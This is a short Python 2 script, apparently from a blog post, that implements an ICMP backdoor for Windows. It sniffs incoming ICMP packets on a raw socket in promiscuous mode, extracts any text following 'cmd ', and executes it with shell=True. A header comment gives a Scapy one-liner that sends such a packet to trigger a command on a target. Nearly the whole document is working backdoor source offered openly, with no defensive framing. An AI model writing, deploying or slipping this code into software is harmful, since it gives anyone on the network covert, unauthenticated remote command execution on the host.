#!/usr/bin/python
#Written by demonalex on Oct 1, 2016
#PoC with Scapy: send(IP(dst="192.168.0.3")/ICMP()/"cmd echo 1 > c:\test.txt")
import socket, re, sys, subprocess
host = socket.gethostname()
#A sniffer dedicated to ICMP
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((host,0))
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
#A sniffer dedicated to ICMP
while 1:
# receive a package
icmp_packet = s.recvfrom(65535)
ipacket=str(icmp_packet)
#print type(ipacket), ":", ipacket
try:
matchstr = re.search(r'cmd (.*)\', \(\'', ipacket, re.M|re.I)
if matchstr:
#print matchstr.group(1)
command = matchstr.group(1)
subprocess.check_output(command, shell=True)
#print "Executed \'", command, "\'"
except:
print "Execution failed."
continue
# disabled promiscuous mode
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
No comments:
Post a Comment